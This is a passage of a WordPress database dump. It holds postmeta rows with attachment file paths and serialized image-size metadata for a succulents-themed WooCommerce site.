300.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"h4-img-3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:20:\"h4-img-3-350x300.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:20:\"h4-img-3-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:20:\"h4-img-3-350x550.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:20:\"h4-img-3-350x550.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:20:\"h4-img-3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"h4-img-3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(306,1468,'_wp_attached_file','2018/01/portfolio-masonry-img-1.jpg'),(307,1468,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:347;s:6:\"height\";i:214;s:4:\"file\";s:35:\"2018/01/portfolio-masonry-img-1.jpg\";s:5:\"sizes\";a:7:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:35:\"portfolio-masonry-img-1-300x214.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:214;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:35:\"portfolio-masonry-img-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"portfolio-masonry-img-1-300x185.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:185;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"portfolio-masonry-img-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:35:\"portfolio-masonry-img-1-300x214.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:214;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:35:\"portfolio-masonry-img-1-300x214.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:214;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:35:\"portfolio-masonry-img-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(308,4112,'_wp_attached_file','2018/03/h5-tabs-img-5.png'),(309,4112,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:221;s:6:\"height\";i:242;s:4:\"file\";s:25:\"2018/03/h5-tabs-img-5.png\";s:5:\"sizes\";a:4:{s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:25:\"h5-tabs-img-5-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"h5-tabs-img-5-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:25:\"h5-tabs-img-5-221x240.png\";s:5:\"width\";i:221;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:25:\"h5-tabs-img-5-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(310,1468,'_wp_attachment_image_alt','a'),(311,4112,'_wp_attachment_image_alt','m'),(312,1133,'_wp_attachment_image_alt','a'),(313,709,'_wp_attachment_image_alt','o'),(314,4113,'_wp_attached_file','2018/03/h5-tabs-img-6.png'),(315,4113,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:238;s:6:\"height\";i:242;s:4:\"file\";s:25:\"2018/03/h5-tabs-img-6.png\";s:5:\"sizes\";a:4:{s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:25:\"h5-tabs-img-6-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"h5-tabs-img-6-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:25:\"h5-tabs-img-6-238x240.png\";s:5:\"width\";i:238;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:25:\"h5-tabs-img-6-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(316,1471,'_wp_attached_file','2018/01/h8-slide2-background.jpg'),(317,1471,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1105;s:6:\"height\";i:737;s:4:\"file\";s:32:\"2018/01/h8-slide2-background.jpg\";s:5:\"sizes\";a:16:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:32:\"h8-slide2-background-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"h8-slide2-background-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:32:\"h8-slide2-background-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"h8-slide2-background-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:33:\"h8-slide2-background-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"h8-slide2-background-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:32:\"h8-slide2-background-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:32:\"h8-slide2-background-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:32:\"h8-slide2-background-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:32:\"h8-slide2-background-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:33:\"h8-slide2-background-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:32:\"h8-slide2-background-550x737.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:737;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:33:\"h8-slide2-background-1100x737.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:737;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:32:\"h8-slide2-background-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:32:\"h8-slide2-background-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:32:\"h8-slide2-background-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(318,1134,'_wp_attached_file','2018/01/product11-gallery3.jpg'),(319,1134,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:30:\"2018/01/product11-gallery3.jpg\";s:5:\"sizes\";a:11:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:30:\"product11-gallery3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:30:\"product11-gallery3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"product11-gallery3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"product11-gallery3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:30:\"product11-gallery3-600x300.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:30:\"product11-gallery3-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:30:\"product11-gallery3-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:30:\"product11-gallery3-600x550.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:30:\"product11-gallery3-550x600.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:30:\"product11-gallery3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:30:\"product11-gallery3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(320,4113,'_wp_attachment_image_alt','m'),(321,3223,'_wp_attachment_image_alt',''),(322,710,'_wp_attached_file','2018/01/h4-img-4.jpg'),(323,710,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:350;s:6:\"height\";i:350;s:4:\"file\";s:20:\"2018/01/h4-img-4.jpg\";s:5:\"sizes\";a:8:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:20:\"h4-img-4-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"h4-img-4-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"h4-img-4-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"h4-img-4-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:20:\"h4-img-4-350x300.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:20:\"h4-img-4-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:20:\"h4-img-4-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"h4-img-4-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(324,4178,'_wp_attached_file','2018/03/landing-about-us-1.jpg'),(325,4178,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:530;s:6:\"height\";i:306;s:4:\"file\";s:30:\"2018/03/landing-about-us-1.jpg\";s:5:\"sizes\";a:8:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:30:\"landing-about-us-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:30:\"landing-about-us-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"landing-about-us-1-300x173.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:173;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"landing-about-us-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:30:\"landing-about-us-1-530x300.jpg\";s:5:\"width\";i:530;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:30:\"landing-about-us-1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:30:\"landing-about-us-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:30:\"landing-about-us-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(326,3224,'_wp_attached_file','2018/02/h3-slide1-graphic6.png'),(327,3224,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1191;s:6:\"height\";i:815;s:4:\"file\";s:30:\"2018/02/h3-slide1-graphic6.png\";s:5:\"sizes\";a:16:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:30:\"h3-slide1-graphic6-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:30:\"h3-slide1-graphic6-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:30:\"h3-slide1-graphic6-600x411.png\";s:5:\"width\";i:600;s:6:\"height\";i:411;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"h3-slide1-graphic6-300x205.png\";s:5:\"width\";i:300;s:6:\"height\";i:205;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:31:\"h3-slide1-graphic6-1024x701.png\";s:5:\"width\";i:1024;s:6:\"height\";i:701;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"h3-slide1-graphic6-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"h3-slide1-graphic6-768x526.png\";s:5:\"width\";i:768;s:6:\"height\";i:526;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:30:\"h3-slide1-graphic6-630x300.png\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:30:\"h3-slide1-graphic6-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:30:\"h3-slide1-graphic6-550x550.png\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:31:\"h3-slide1-graphic6-1100x550.png\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:30:\"h3-slide1-graphic6-550x815.png\";s:5:\"width\";i:550;s:6:\"height\";i:815;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:31:\"h3-slide1-graphic6-1100x815.png\";s:5:\"width\";i:1100;s:6:\"height\";i:815;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:30:\"h3-slide1-graphic6-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:30:\"h3-slide1-graphic6-600x411.png\";s:5:\"width\";i:600;s:6:\"height\";i:411;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:30:\"h3-slide1-graphic6-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(328,2115,'_wp_attachment_image_alt','a'),(329,710,'_wp_attachment_image_alt','o'),(330,4178,'_wp_attachment_image_alt','a'),(331,712,'_wp_attached_file','2018/01/h4-img-6.jpg'),(332,712,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:350;s:6:\"height\";i:350;s:4:\"file\";s:20:\"2018/01/h4-img-6.jpg\";s:5:\"sizes\";a:8:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:20:\"h4-img-6-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"h4-img-6-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"h4-img-6-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"h4-img-6-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:20:\"h4-img-6-350x300.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:20:\"h4-img-6-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:20:\"h4-img-6-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"h4-img-6-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(333,2129,'_wp_attached_file','2018/02/blog-recipe-2.jpg'),(334,2129,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1100;s:6:\"height\";i:733;s:4:\"file\";s:25:\"2018/02/blog-recipe-2.jpg\";s:5:\"sizes\";a:15:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:25:\"blog-recipe-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:25:\"blog-recipe-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:25:\"blog-recipe-2-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"blog-recipe-2-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:26:\"blog-recipe-2-1024x682.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"blog-recipe-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"blog-recipe-2-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:25:\"blog-recipe-2-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:25:\"blog-recipe-2-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:25:\"blog-recipe-2-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:26:\"blog-recipe-2-1100x550.jpg\";s:5:\"width\";i:1100;s